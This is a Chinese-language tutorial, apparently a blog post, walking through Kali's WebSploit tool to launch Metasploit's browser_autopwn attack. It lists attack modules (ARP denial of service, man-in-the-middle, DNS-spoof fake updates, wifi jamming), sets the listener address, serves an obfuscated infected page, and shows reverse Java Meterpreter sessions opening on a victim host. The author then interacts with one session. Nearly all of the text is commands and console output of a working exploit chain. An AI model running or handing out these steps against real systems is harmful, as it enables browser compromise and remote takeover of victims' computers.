走过岁月......

这和上篇介绍的原理一致，只是多一个思路。利用kali里的websploit进行调用msf模块攻击。

1.打开websploit

root@kali:~# websploit

WARNING: No route found for IPv6 destination :: (no default route?)

__      __          __                      ___               __

/\ \  __/\ \        /\ \                    /\_ \           __/\ \__

\ \ \/\ \ \ \     __\ \ \____    ____  _____\//\ \     ___ /\_\ \ ,_\

 \ \ \ \ \ \ \  /'__`\ \ '__`\  /',__\/\ '__`\\ \ \   / __`\/\ \ \ \/

  \ \ \_/ \_\ \/\  __/\ \ \L\ \/\__, `\ \ \L\ \\_\ \_/\ \L\ \ \ \ \ \_

   \ `\___x___/\ \____\\ \_,__/\/\____/\ \ ,__//\____\ \____/\ \_\ \__\

    '\/__//__/  \/____/ \/___/  \/___/  \ \ \/ \/____/\/___/  \/_/\/__/

                                         \ \_\

                                          \/_/ 

--=[WebSploit FrameWork

+---**---==[Version :2.0.5 BETA

+---**---==[Codename :We're Not Crying Wolf

+---**---==[Available Modules : 19

--=[Update Date : [r2.0.5-000 2.3.2014]

wsf > show modules

2.查看所有模块

wsf > show modules

Web ModulesDescription

----------------------------------------

web/apache_usersScan Directory Of Apache Users

web/dir_scannerDirectory Scanner

web/wmapInformation Gathering From Victim Web Using (Metasploit Wmap)

web/pmaPHPMyAdmin Login Page Scanner

web/cloudflare_resolverCloudFlare Resolver

Network ModulesDescription

----------------------------------------

network/arp_dosARP Cache Denial Of Service Attack

network/mfodMiddle Finger Of Doom Attack

network/mitmMan In The Middle Attack

network/mlitmMan Left In The Middle Attack

network/webkillerTCP Kill Attack

network/fakeupdateFake Update Attack Using DNS Spoof

network/arp_poisonerArp Poisoner

Exploit ModulesDescription

----------------------------------------

exploit/autopwnMetasploit Autopwn Service

exploit/browser_autopwnMetasploit Browser Autopwn Service

exploit/java_appletJava Applet Attack (Using HTML)

Wireless / Bluetooth ModulesDescription

----------------------------------------

wifi/wifi_jammerWifi Jammer

wifi/wifi_dosWifi Dos Attack

wifi/wifi_honeypotWireless Honeypot(Fake AP)

bluetooth/bluetooth_podBluetooth Ping Of Death Attack

3.找到browser_autopwn模块并配置参数

wsf > use exploit/browser_autopwn

wsf:Browser_Autopwn > show options

Options Value RQ Description

-----------------------------------------

Interfaceeth0yesNetwork Interface Name

LHOST192.168.1.1yesLocal IP Address

wsf:Browser_Autopwn > set LHOST 192.168.73.128

INTERFACE =>  192.168.73.128

4.执行攻击

wsf:Browser_Autopwn > run

[*]Starting WebServer ... Please Wait ...

[*]Configuration DNS Spoof ... 

[*]Creating Infected Page For Victim ...

[*]Engine Has Been Started.

[!] ************************************************************************

[!] *               The utility msfcli is deprecated!                      *

[!] *            It will be removed on or about 2015-06-18                 *

[!] *              Please use msfconsole -r or -x instead                  *

[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/3802   *

[!] ************************************************************************

[*] Initializing modules...

LHOST => 192.168.73.128

URIPATH => index

[*] Auxiliary module execution completed

[*] Setup

[*] Obfuscating initial javascript 2015-04-23 22:13:34 -0400

[*] Done in 1.020195799 seconds

msf auxiliary(browser_autopwn) > 

[*] Starting exploit modules on host 192.168.73.128...

[*] ---

可以看出，已经在调用msf模块，以下自动处理过程msf直接执行攻击一致

..................................以下省略N字.................................

[*] Starting the payload handler...

[*] Starting handler for java/meterpreter/reverse_tcp on port 7777

[*] Started reverse handler on 192.168.73.128:6666

[*] Starting the payload handler...

[*] Started reverse handler on 192.168.73.128:7777

[*] Starting the payload handler...

[*] --- Done, found 21 exploit modules

[*] Using URL: https://0.0.0.0:8080/index

[*]  Local IP: https://192.168.73.128:8080/index

[*] Server started.

5.访问上面给出的URL地址【https://192.168.73.128:8080/index】

[*] Session ID 1 (192.168.73.128:7777 -> 192.168.73.1:51084) processing InitialAutoRunScript 'migrate -f'

[*] Session ID 2 (192.168.73.128:7777 -> 192.168.73.1:51085) processing InitialAutoRunScript 'migrate -f'

[*] Session ID 3 (192.168.73.128:7777 -> 192.168.73.1:51086) processing InitialAutoRunScript 'migrate -f'

msf auxiliary(browser_autopwn) > sessions

Active sessions

===============

  Id  Type                   Information  Connection

  --  ----                   -----------  ----------

  1   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51084 (192.168.73.1)

  2   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51085 (192.168.73.1)

  3   meterpreter java/java  tt @ liuxin  192.168.73.128:7777 -> 192.168.73.1:51086 (192.168.73.1)

6.选中一个session

msf auxiliary(browser_autopwn) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > ipconfig

Interface  1

============

Name         : lo - Software Loopback Interface 1

Hardware MAC : 00:00:00:00:00:00

MTU          : 4294967295

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff